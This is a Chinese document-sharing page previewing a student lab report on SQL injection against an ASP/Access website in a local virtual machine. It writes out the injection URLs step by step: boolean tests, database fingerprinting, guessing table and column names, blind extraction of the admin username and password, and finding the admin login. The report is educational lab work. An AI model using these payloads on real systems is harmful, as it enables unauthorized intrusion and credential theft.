欢迎来到冰点文库! | 帮助中心 分享价值,成长自我!
冰点文库
全部分类
  • 临时分类>
  • IT计算机>
  • 经管营销>
  • 医药卫生>
  • 自然科学>
  • 农林牧渔>
  • 人文社科>
  • 工程科技>
  • PPT模板>
  • 求职职场>
  • 解决方案>
  • 总结汇报>
  • ImageVerifierCode 换一换
    首页 冰点文库 > 资源分类 > DOCX文档下载
    分享到微信 分享到微博 分享到QQ空间

    SQL注入攻击实验报告.docx

    • 资源ID:10129489       资源大小:932.55KB        全文页数:15页
    • 资源格式: DOCX        下载积分:3金币
    快捷下载 游客一键下载
    账号登录下载
    微信登录下载
    三方登录下载: 微信开放平台登录 QQ登录
    二维码
    微信扫一扫登录
    下载资源需要3金币
    邮箱/手机:
    温馨提示:
    快捷下载时,用户名和密码都是您填写的邮箱或者手机号,方便查询和重复下载(系统自动生成)。
    如填写123,账号就是123,密码也是123。
    支付方式: 支付宝    微信支付   
    验证码:   换一换

    加入VIP,免费下载
     
    账号:
    密码:
    验证码:   换一换
      忘记密码?
        
    友情提示
    2、PDF文件下载后,可能会被浏览器默认打开,此种情况可以点击浏览器菜单,保存网页到桌面,就可以正常下载了。
    3、本站不支持迅雷下载,请使用电脑自带的IE浏览器,或者360浏览器、谷歌浏览器下载即可。
    4、本站资源下载后的文档和图纸-无水印,预览文档经过压缩,下载后原文更清晰。
    5、试题试卷类文档,如果标题没有明确说明有答案则都视为没有答案,请知晓。

    SQL注入攻击实验报告.docx

    1、SQL注入攻击实验报告SQL注入攻击实验报告实验报告(实验名称 :SQL注入攻击) 然后,验证宿主机和虚拟机是否联通,结果显示连接成功。最后在虚拟机上安装IIS程序,打开浏览器,输入地址“127.0.0.1”,检查网站搭建情况。成功!(二)寻找注入点在宿主机上,打开网页http:/192.168.18.9/list.asp?id=95,可以正常打开页面。 进行注入测试,键入 http:/192.168.18.9/list.asp?id=95 and 1=1,返回页面不变。键入 http:/192.168.18.9/list.asp?id=95 and 1=2,返回页面出错。 因此,可确定该网站

    2、存在注入点。(三)判断数据库类型用系统表的方法进行判断,分别键入http:/192.168.18.9/list.asp?id=95 and (select count(*) from sysobjects)0http:/192.168.18.9/list.asp?id=95 and (select count(*) from msysobjects)0两者返回均出错,可知是 access 数据库。(四)猜测表名一般网站后台的管理员都默认在表 admin 中,我们先试一下,键入:http:/192.168.18.9/list.asp?id=95 and (select count(*) from

    3、 admin)0返回页面正常,可知该网站后台数据库中存在着表名为 admin 的表。(五)猜测字段名不同公司网站有不同的字段名,但一般都有三个字段,分别记录 ID 号、用户名和密码,常用的字段名为:id,username,password。分别键入 http:/192.168.18.9/list.asp?id=95 and (select count(id) from admin)0 http:/192.168.18.9/list.asp?id=95 and (select count(username) from admin)0 http:/192.168.18.9/list.asp?id=

    4、95 and (select count(password) from admin)0 三者返回均正常。 可知,表 admin 中存在的三个字段:id,username,password。注:“username”的截图损坏,但是返回正常,望教员通融。(六)猜测管理员用户名和密码 1.确定表 admin 中有几条记录,键入 http:/192.168.18.9/list.asp?id=95 and (select count(*) from admin)=1 返回页面正常。 可知,表 admin 只有一条记录。 2.猜测用户名长度,键入 http:/192.168.18.9/list.asp?i

    5、d=95 and (select len(username) from admin)=1 返回出错,继续键入 http:/192.168.18.9/list.asp?id=95 and (select len(username) from admin)=2 返回出错,继续测试 3/4/5,直到返回页面正确。测试到 5 的时候,返回正常。可知,用户名长度为 5。 3.猜测用户名内容,采用 ASCII 码分析法先猜测第1 位,用二分法,键入 http:/192.168.18.9/list.asp?id=95 and (select count(*) from admin where (asc(mi

    6、d(username,1,1)between 30 and 125)0 返回正确,进一步缩小范围 between 70 and 100 ,between 85 and 100 ,between 90 and 100,=97。可知第一个字符为 a。 依此类推,猜测之后的每一位字符,最后得到用户名为 admin。4.猜测密码,同理: http:/192.168.18.9/list.asp?id=95 and (select len(password) from admin)=6 所以密码为6位。 最终得到密码为 6 位:123456。(七)寻找到后台管理窗口 打开“啊 D”软件,点击进入“管理入口

    7、检测”选项,点击“检测管理入口”,进行检测,如图:打开检测到的各网址,测试是否为管理入口。 可知 http:/192.168.18.9/admin/index.asp 为管理入口,如图:(八)登陆后台 找到后台管理窗口,http:/192.168.18.9/admin/ad_login.asp,用刚刚得到的用户 名和密码登陆,后台登陆成功。四、实验结果及分析SQL注入攻击过程。 1) 判断Web环境是否可以SQL注入。如果URL仅是对网页的访问,不存在SQL注入问题,如: http:/192.168.18.9/list.asp?id=95,其中?id95表示数据库查询变量,这种语句会在数据库中

    8、执行,因此可能会给数据库带来威胁。 2) 寻找SQL注入点。完成上一步的片断后,就要寻找可利用的注入漏洞,通过输入一 些特殊语句,可以根据浏览器返回信息,判断数据库类型,从而构建数据库查询语句找到注入点。 3) 猜解用户名和密码。数据库中存放的表名、字段名都是有规律可言的。通过构建特 殊数据库语句在数据库中依次查找表名、字段名、用户名和密码的长度,以及内容。这个过程可以通过网上大量注入工具快速实现,并借助破解网站轻易破译用户密码。 4) 寻找WEB管理后台入口。通常WEB后台管理的界面不面向普通用户开放,要寻找 到后台的登陆路径,可以利用扫描工具快速搜索到可能的登陆地址,依次进行尝试,就可以试出管理台的入口地址。 5) 入侵和破坏。成功登陆后台管理后,接下来就可以任意进行破坏行为,如篡改网页、 上传木马、修改、泄漏用户信息等,并进一步入侵数据库服务器。实验心得:在实验的过程中遇到了很多困难,配置上的,环境上的,还有一些需要注意的小问题,而且从整个实验的过程来讲也涉及到了很多软件的配合使用。在整个实验中遇到的最大问题就是,宿主机和虚拟机此前一直连不通,通过宿主机ping虚拟机,一直无法连接。直到最后我把虚拟机的防火墙关闭了,宿主机才能访问虚拟机上发布的网页。可见,防火墙还是有一定作用的,但是对于网站来说开通了防火墙就没办法访问网页了。


    注意事项

    本文(SQL注入攻击实验报告.docx)为本站会员主动上传,冰点文库仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对上载内容本身不做任何修改或编辑。 若此文所含内容侵犯了您的版权或隐私,请立即通知冰点文库(点击联系客服),我们立即给予删除!

    温馨提示:如果因为网速或其他原因下载失败请重新下载,重复下载不扣分。




    关于我们 - 网站声明 - 网站地图 - 资源地图 - 友情链接 - 网站客服 - 联系我们

    copyright@ 2008-2023 冰点文库 网站版权所有

    经营许可证编号:鄂ICP备19020893号-2


    收起
    展开